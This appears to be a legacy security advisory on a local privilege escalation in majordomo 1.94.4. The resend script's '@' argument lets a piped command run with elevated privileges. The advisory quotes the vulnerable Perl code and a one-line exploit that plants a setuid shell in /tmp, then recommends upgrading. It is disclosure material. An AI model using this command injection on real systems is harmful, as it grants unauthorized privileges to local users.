COMMAND

    majordomo

SYSTEMS AFFECTED

    majordomo 1.94.4

PROBLEM

    Brock  Tellier  found  a  vulnerability  in majordomo which allows
    local  users  to  gain  elevated  privileges.   He only tested the
    version  of  majordomo  which  comes  with  UnixWare  7.1 which is
    1.94.4, but further testing showed that all 1.94.4 are vulnerable.
    However, it exists on the default UW7.1 installation.

    The  majordomo  wrapper  allows  users  to  run  programs  in  the
    /usr/local/majordomo directory with the  uid of owner and  the gid
    of daemon.  The permissions for wrapper are:

        -rwsr-xr-x    1 root     daemon         6464 Jan  4  1999  /usr/local/majordomo/wrapper

    but wrapper immediatly  setuid()'s and setgid()'s  to owner:daemon
    before  execing   the  wrapped   program.    A  vulnerability   in
    "/usr/local/majordomo/resend" will allow  us to execute  arbitrary
    commands with our elevated privileges.  The following code snippet
    appears in resend, a perl script:

        # If the first argument is "@filename", read the real arguments
        # from "filename", and shove them onto the ARGV for later processing
        # by &Getopts()
        #
        if ($ARGV[0] =~ /^\@/) {
            $fn = shift(@ARGV);
            $fn =~ s/^@//;
            open(AV, $fn) || die("open(AV, \"$fn\"): $!\nStopped");

    As you  can see,  if our  first argument  to resend  starts with a
    "@", resend will attempt to open() the filename.  However,  open()
    can also be used to run  programs if the first argument to  open()
    begins with a pipe "|".   If our first argument is "@|id",  resend
    will run the program "id" with full privileges.

    Our exploit is simple:

        bash-2.02$ /usr/local/majordomo/wrapper resend '@|cp /bin/ksh /tmp/xnec;chmod 6555 /tmp/xnec'
        resend: must specify '-l list' at /usr/local/majordomo/resend line 77.

        bash-2.02$ ls -la /tmp/xnec
        -r-sr-sr-x    1 owner    daemon       361688 Dec 29 06:26 /tmp/xnec

    There are  numerous holes  in majordomo's  scripts.   Most of them
    allow  you  to  specify  an  alternate  .cf file, and that file is
    executed as  majordomo.daemon or  majordomo.majordomo.   A FreeBSD
    box  tested  on  had  it  running  as  group  daemon,  as  INSTALL
    suggested, and because  mrtg was group  daemon and 775  instead of
    755 (not sure if that's how mrtg is installed by default) and mrtg
    is crontabbed to run  as root every 5  minutes, this tiny hole  in
    majordomo gives root to any local users.

SOLUTION

    The vendors of  majordomo have produced  a minor software  release
    which addresses the vulnerability in versions 1.94.4 and  earlier.
    Sites  using  affected  versions  should  immediately  upgrade  to
    majordomo 1.94.5 which is available from:

        ftp://ftp.greatcircle.com/pub/majordomo/1.94.5/majordomo-1.94.5.tgz
        ftp://ftp.sgi.com/other/majordomo/majordomo-1.94.5.tgz

    Sites using majordomo should also take this opportunity to  ensure
    that  their  majordomo  is  configured  correctly.   While correct
    configuration does  not prevent  the vulnerability  listed in this
    advisory being exploited it may help limit the privileges a  local
    user may  gain.   More information  on this  can be  found in  the
    INSTALL file and in the majordomo FAQ available at:

        http://www.greatcircle.com/majordomo/FAQ.html